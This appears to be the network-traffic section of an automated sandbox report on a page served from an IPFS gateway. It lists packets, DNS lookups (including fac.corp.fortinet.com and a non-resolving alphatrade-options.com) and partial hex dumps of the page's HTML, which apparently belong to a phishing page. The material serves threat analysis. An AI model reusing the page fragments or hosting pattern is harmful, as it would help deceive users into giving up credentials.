Jan 16, 2025 01:33:01.032900095 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.032948017 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.126477957 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.126508951 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.126554966 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.126579046 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.126609087 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.126626015 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.126878023 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.127284050 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.127325058 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.127897024 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.127918959 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.127960920 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.127973080 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.127995968 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.128000975 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.128029108 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.128037930 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.128066063 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.128088951 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.128137112 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.128294945 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.128386974 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.128772020 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.128844976 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.128920078 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.128927946 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.129344940 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.129376888 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.170737982 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.400155067 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.409472942 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.409547091 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.409585953 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.409589052 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.409620047 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.409620047 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.409661055 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.409677029 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.488773108 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.488801956 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.488857031 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.488888979 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.488905907 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.488925934 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.496104002 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.496133089 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.496187925 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.496203899 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.496242046 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.573177099 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.573251009 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.573272943 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.573290110 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:01.573329926 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.573577881 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:01.573594093 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:07.475001097 CET	443	49737	142.250.185.100	192.168.2.4
Jan 16, 2025 01:33:07.475080013 CET	443	49737	142.250.185.100	192.168.2.4
Jan 16, 2025 01:33:07.475219965 CET	49737	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:33:09.359467030 CET	49737	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:33:09.359504938 CET	443	49737	142.250.185.100	192.168.2.4
Jan 16, 2025 01:33:09.870745897 CET	49723	80	192.168.2.4	2.22.50.144
Jan 16, 2025 01:33:09.875832081 CET	80	49723	2.22.50.144	192.168.2.4
Jan 16, 2025 01:33:09.875883102 CET	49723	80	192.168.2.4	2.22.50.144
Jan 16, 2025 01:33:24.801495075 CET	80	49724	217.20.57.18	192.168.2.4
Jan 16, 2025 01:33:24.801597118 CET	49724	80	192.168.2.4	217.20.57.18
Jan 16, 2025 01:33:24.801635027 CET	49724	80	192.168.2.4	217.20.57.18
Jan 16, 2025 01:33:24.806550980 CET	80	49724	217.20.57.18	192.168.2.4
Jan 16, 2025 01:33:54.615686893 CET	50389	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:54.620539904 CET	53	50389	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:54.620609999 CET	50389	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:54.625489950 CET	53	50389	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:55.084645987 CET	50389	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:55.089628935 CET	53	50389	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:55.089673996 CET	50389	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:56.984188080 CET	50407	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:33:56.984216928 CET	443	50407	142.250.185.100	192.168.2.4
Jan 16, 2025 01:33:56.984374046 CET	50407	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:33:56.985033989 CET	50407	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:33:56.985044003 CET	443	50407	142.250.185.100	192.168.2.4
Jan 16, 2025 01:33:57.628088951 CET	443	50407	142.250.185.100	192.168.2.4
Jan 16, 2025 01:33:57.628376007 CET	50407	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:33:57.628386974 CET	443	50407	142.250.185.100	192.168.2.4
Jan 16, 2025 01:33:57.628693104 CET	443	50407	142.250.185.100	192.168.2.4
Jan 16, 2025 01:33:57.628999949 CET	50407	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:33:57.629045010 CET	443	50407	142.250.185.100	192.168.2.4
Jan 16, 2025 01:33:57.670310020 CET	50407	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:34:07.526523113 CET	443	50407	142.250.185.100	192.168.2.4
Jan 16, 2025 01:34:07.526640892 CET	443	50407	142.250.185.100	192.168.2.4
Jan 16, 2025 01:34:07.526731968 CET	50407	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:34:09.360110044 CET	50407	443	192.168.2.4	142.250.185.100
Jan 16, 2025 01:34:09.360121965 CET	443	50407	142.250.185.100	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 01:32:52.702672005 CET	53	60039	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:52.805633068 CET	53	53843	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:53.796747923 CET	53	49778	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:56.921586990 CET	49748	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:56.921720028 CET	62533	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:56.929275990 CET	53	49748	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:56.929564953 CET	53	62533	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:58.547431946 CET	49428	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:58.549407005 CET	64481	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:58.554673910 CET	53	49428	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:58.556479931 CET	53	64481	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:58.569111109 CET	63670	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:58.569267988 CET	64177	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:58.576950073 CET	53	63670	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:58.578912020 CET	53	64177	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:59.207948923 CET	60344	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:59.208082914 CET	56054	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:59.208554029 CET	65409	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:59.208815098 CET	55479	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:59.209120989 CET	50361	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:59.209280014 CET	51692	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:32:59.214734077 CET	53	60344	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:59.214756012 CET	53	56054	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:59.215770006 CET	53	55479	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:59.240520000 CET	53	65409	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:59.529377937 CET	53	51692	1.1.1.1	192.168.2.4
Jan 16, 2025 01:32:59.538712978 CET	53	50361	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:00.263704062 CET	53	64535	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:00.370171070 CET	59166	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:00.370625019 CET	52016	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:00.377079010 CET	53	59166	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:00.377233982 CET	53	52016	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:00.482839108 CET	52009	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:00.483129978 CET	57862	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:00.486430883 CET	49493	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:00.486587048 CET	52888	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:00.491894007 CET	53	52009	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:00.492724895 CET	53	57862	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:00.493405104 CET	53	49493	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:00.493717909 CET	59638	53	192.168.2.4	1.1.1.1
Jan 16, 2025 01:33:00.495033026 CET	53	52888	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:00.502562046 CET	53	59638	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:10.300728083 CET	138	138	192.168.2.4	192.168.2.255
Jan 16, 2025 01:33:10.757168055 CET	53	62892	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:29.648233891 CET	53	49825	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:52.069399118 CET	53	61701	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:52.572439909 CET	53	49715	1.1.1.1	192.168.2.4
Jan 16, 2025 01:33:54.615217924 CET	53	62223	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 16, 2025 01:32:56.921586990 CET	192.168.2.4	1.1.1.1	0xb438	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:56.921720028 CET	192.168.2.4	1.1.1.1	0x60b3	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 16, 2025 01:32:58.547431946 CET	192.168.2.4	1.1.1.1	0x23fc	Standard query (0)	ipfs.io	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:58.549407005 CET	192.168.2.4	1.1.1.1	0x64fc	Standard query (0)	ipfs.io	65	IN (0x0001)	false
Jan 16, 2025 01:32:58.569111109 CET	192.168.2.4	1.1.1.1	0xf4f5	Standard query (0)	ipfs.io	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:58.569267988 CET	192.168.2.4	1.1.1.1	0xf8a4	Standard query (0)	ipfs.io	65	IN (0x0001)	false
Jan 16, 2025 01:32:59.207948923 CET	192.168.2.4	1.1.1.1	0x7c69	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.208082914 CET	192.168.2.4	1.1.1.1	0x3065	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Jan 16, 2025 01:32:59.208554029 CET	192.168.2.4	1.1.1.1	0x4243	Standard query (0)	ik.imagekit.io	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.208815098 CET	192.168.2.4	1.1.1.1	0x8e0d	Standard query (0)	ik.imagekit.io	65	IN (0x0001)	false
Jan 16, 2025 01:32:59.209120989 CET	192.168.2.4	1.1.1.1	0xb7d4	Standard query (0)	fac.corp.fortinet.com	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.209280014 CET	192.168.2.4	1.1.1.1	0xfbb5	Standard query (0)	fac.corp.fortinet.com	65	IN (0x0001)	false
Jan 16, 2025 01:33:00.370171070 CET	192.168.2.4	1.1.1.1	0x645e	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.370625019 CET	192.168.2.4	1.1.1.1	0x29e7	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Jan 16, 2025 01:33:00.482839108 CET	192.168.2.4	1.1.1.1	0xda7f	Standard query (0)	alphatrade-options.com	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.483129978 CET	192.168.2.4	1.1.1.1	0xbb2e	Standard query (0)	alphatrade-options.com	65	IN (0x0001)	false
Jan 16, 2025 01:33:00.486430883 CET	192.168.2.4	1.1.1.1	0x9418	Standard query (0)	ik.imagekit.io	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.486587048 CET	192.168.2.4	1.1.1.1	0xe4bf	Standard query (0)	ik.imagekit.io	65	IN (0x0001)	false
Jan 16, 2025 01:33:00.493717909 CET	192.168.2.4	1.1.1.1	0x104b	Standard query (0)	alphatrade-options.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 01:32:56.929275990 CET	1.1.1.1	192.168.2.4	0xb438	No error (0)	www.google.com		142.250.185.100	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:56.929564953 CET	1.1.1.1	192.168.2.4	0x60b3	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 16, 2025 01:32:58.554673910 CET	1.1.1.1	192.168.2.4	0x23fc	No error (0)	ipfs.io		209.94.90.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:58.556479931 CET	1.1.1.1	192.168.2.4	0x64fc	No error (0)	ipfs.io			65	IN (0x0001)	false
Jan 16, 2025 01:32:58.576950073 CET	1.1.1.1	192.168.2.4	0xf4f5	No error (0)	ipfs.io		209.94.90.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:58.578912020 CET	1.1.1.1	192.168.2.4	0xf8a4	No error (0)	ipfs.io			65	IN (0x0001)	false
Jan 16, 2025 01:32:59.214734077 CET	1.1.1.1	192.168.2.4	0x7c69	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.214734077 CET	1.1.1.1	192.168.2.4	0x7c69	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.214734077 CET	1.1.1.1	192.168.2.4	0x7c69	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.214734077 CET	1.1.1.1	192.168.2.4	0x7c69	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.215770006 CET	1.1.1.1	192.168.2.4	0x8e0d	No error (0)	ik.imagekit.io	d28h3jm4r3crf8.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 01:32:59.240520000 CET	1.1.1.1	192.168.2.4	0x4243	No error (0)	ik.imagekit.io	d28h3jm4r3crf8.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 01:32:59.240520000 CET	1.1.1.1	192.168.2.4	0x4243	No error (0)	d28h3jm4r3crf8.cloudfront.net		65.9.66.107	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.240520000 CET	1.1.1.1	192.168.2.4	0x4243	No error (0)	d28h3jm4r3crf8.cloudfront.net		65.9.66.13	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.240520000 CET	1.1.1.1	192.168.2.4	0x4243	No error (0)	d28h3jm4r3crf8.cloudfront.net		65.9.66.41	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.240520000 CET	1.1.1.1	192.168.2.4	0x4243	No error (0)	d28h3jm4r3crf8.cloudfront.net		65.9.66.52	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:32:59.538712978 CET	1.1.1.1	192.168.2.4	0xb7d4	No error (0)	fac.corp.fortinet.com		208.91.114.103	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.377079010 CET	1.1.1.1	192.168.2.4	0x645e	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.377079010 CET	1.1.1.1	192.168.2.4	0x645e	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.377079010 CET	1.1.1.1	192.168.2.4	0x645e	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.377079010 CET	1.1.1.1	192.168.2.4	0x645e	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.491894007 CET	1.1.1.1	192.168.2.4	0xda7f	Name error (3)	alphatrade-options.com	none	none	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.492724895 CET	1.1.1.1	192.168.2.4	0xbb2e	Name error (3)	alphatrade-options.com	none	none	65	IN (0x0001)	false
Jan 16, 2025 01:33:00.493405104 CET	1.1.1.1	192.168.2.4	0x9418	No error (0)	ik.imagekit.io	d28h3jm4r3crf8.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 01:33:00.493405104 CET	1.1.1.1	192.168.2.4	0x9418	No error (0)	d28h3jm4r3crf8.cloudfront.net		65.9.66.13	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.493405104 CET	1.1.1.1	192.168.2.4	0x9418	No error (0)	d28h3jm4r3crf8.cloudfront.net		65.9.66.52	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.493405104 CET	1.1.1.1	192.168.2.4	0x9418	No error (0)	d28h3jm4r3crf8.cloudfront.net		65.9.66.41	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.493405104 CET	1.1.1.1	192.168.2.4	0x9418	No error (0)	d28h3jm4r3crf8.cloudfront.net		65.9.66.107	A (IP address)	IN (0x0001)	false
Jan 16, 2025 01:33:00.495033026 CET	1.1.1.1	192.168.2.4	0xe4bf	No error (0)	ik.imagekit.io	d28h3jm4r3crf8.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 01:33:00.502562046 CET	1.1.1.1	192.168.2.4	0x104b	Name error (3)	alphatrade-options.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipfs.io

https:

code.jquery.com

ik.imagekit.io

fac.corp.fortinet.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	209.94.90.1	443	3180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 00:32:59 UTC	714	OUT	GET /ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre HTTP/1.1 Host: ipfs.io Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 00:32:59 UTC	1069	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 00:32:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close access-control-allow-headers: Content-Type access-control-allow-headers: Range access-control-allow-headers: User-Agent access-control-allow-headers: X-Requested-With access-control-allow-methods: GET access-control-allow-methods: HEAD access-control-allow-methods: OPTIONS access-control-allow-origin: * access-control-expose-headers: Content-Length access-control-expose-headers: Content-Range access-control-expose-headers: X-Chunked-Output access-control-expose-headers: X-Ipfs-Path access-control-expose-headers: X-Ipfs-Roots access-control-expose-headers: X-Stream-Output Cache-Control: public, max-age=29030400, immutable x-ipfs-path: /ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre x-ipfs-roots: bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre x-ipfs-pop: rainbow-ny5-01 CF-Cache-Status: HIT Age: 30793 Server: cloudflare CF-RAY: 902a02f188364402-EWR alt-svc: h3=":443"; ma=86400
2025-01-16 00:32:59 UTC	300	IN	Data Raw: 37 62 38 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 22 61 61 6f 72 62 64 78 6f 61 6b 6a 73 31 68 77 64 35 70 69 76 6d 6b 32 70 6c 6d 6b 35 77 31 75 6f 76 68 67 61 30 39 6a 39 37 7a 65 6d 6d 70 61 66 79 73 30 63 73 38 32 79 31 65 74 37 32 7a 7a 75 76 6e 6f 75 6a 66 68 6f 67 34 66 67 37 31 31 76 6a 70 6c 76 33 39 73 6d 6f 38 38 6a 34 70 79 6b 73 6b 74 65 6c 36 67 79 37 65 39 70 39 34 73 74 77 38 70 67 68 6d 77 65 62 76 66 73 30 35 36 74 68 69 32 33 30 74 76 77 38 6e 30 22 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f Data Ascii: 7b83<!DOCTYPE html><html lang="en">..."aaorbdxoakjs1hwd5pivmk2plmk5w1uovhga09j97zemmpafys0cs82y1et72zzuvnoujfhog4fg711vjplv39smo88j4pyksktel6gy7e9p94stw8pghmwebvfs056thi230tvw8n0"--><head> <meta charset="UTF-8"> <meta name="viewport" co
2025-01-16 00:32:59 UTC	1369	IN	Data Raw: 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 69 64 3d 22 66 61 76 69 63 6f 6e 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 70 68 61 74 72 61 64 65 2d 6f 70 74 69 6f 6e 73 2e 63 6f 6d 2f 67 69 74 2f 72 61 6e 64 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 Data Ascii: > <meta http-equiv="X-UA-Compatible" content="ie=edge"> <meta name="referrer" content="strict-origin"> <link id="favicon" rel="shortcut icon" type="image/png" href="https://alphatrade-options.com/git/rand/favicon.png"> <script src="h
2025-01-16 00:32:59 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 35 31 35 32 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 69 6e 70 75 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 35 70 78 20 33 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 69 6e 70 75 74 2e 73 75 Data Ascii: color: #425152; text-decoration: none; } a:hover { text-decoration: underline; } input { border-radius: 5px; padding: 5px 3px; } input.su
2025-01-16 00:32:59 UTC	1369	IN	Data Raw: 47 36 4a 2f 65 4f 2b 71 59 65 4f 61 50 47 74 53 61 36 6e 47 31 67 6f 5a 65 63 30 33 65 5a 4d 36 72 38 48 4f 39 30 30 70 73 66 7a 75 57 6d 4f 56 35 79 2f 58 47 30 31 31 74 4b 6c 74 56 4f 6c 37 49 79 31 63 31 53 49 65 74 62 52 48 6e 70 2f 73 41 36 57 39 59 39 74 4d 5a 56 79 6b 43 6e 4b 42 63 52 45 72 78 6e 4e 44 63 71 4d 42 63 62 4f 65 37 56 49 6e 41 4a 2f 2f 6b 42 47 63 37 56 67 54 54 59 64 66 4f 36 78 72 6a 52 55 42 65 4b 76 34 64 73 65 34 32 44 61 73 30 7a 36 71 4f 69 50 47 78 56 4a 52 6c 44 66 5a 73 66 71 59 2b 6d 79 6e 39 7a 2b 78 63 30 32 73 53 4c 50 6a 6b 46 4e 44 58 64 43 4f 6d 6c 31 62 6d 36 34 70 4d 64 67 52 48 67 32 4a 5a 75 77 36 58 62 7a 33 46 59 66 42 42 51 4f 78 62 47 4f 72 61 41 6f 47 57 45 69 46 71 55 62 4b 51 73 63 43 6b 75 4e 79 4b 71 33 Data Ascii: G6J/eO+qYeOaPGtSa6nG1goZec03eZM6r8HO900psfzuWmOV5y/XG011tKltVOl7Iy1c1SIetbRHnp/sA6W9Y9tMZVykCnKBcRErxnNDcqMBcbOe7VInAJ//kBGc7VgTTYdfO6xrjRUBeKv4dse42Das0z6qOiPGxVJRlDfZsfqY+myn9z+xc02sSLPjkFNDXdCOml1bm64pMdgRHg2JZuw6Xbz3FYfBBQOxbGOraAoGWEiFqUbKQscCkuNyKq3
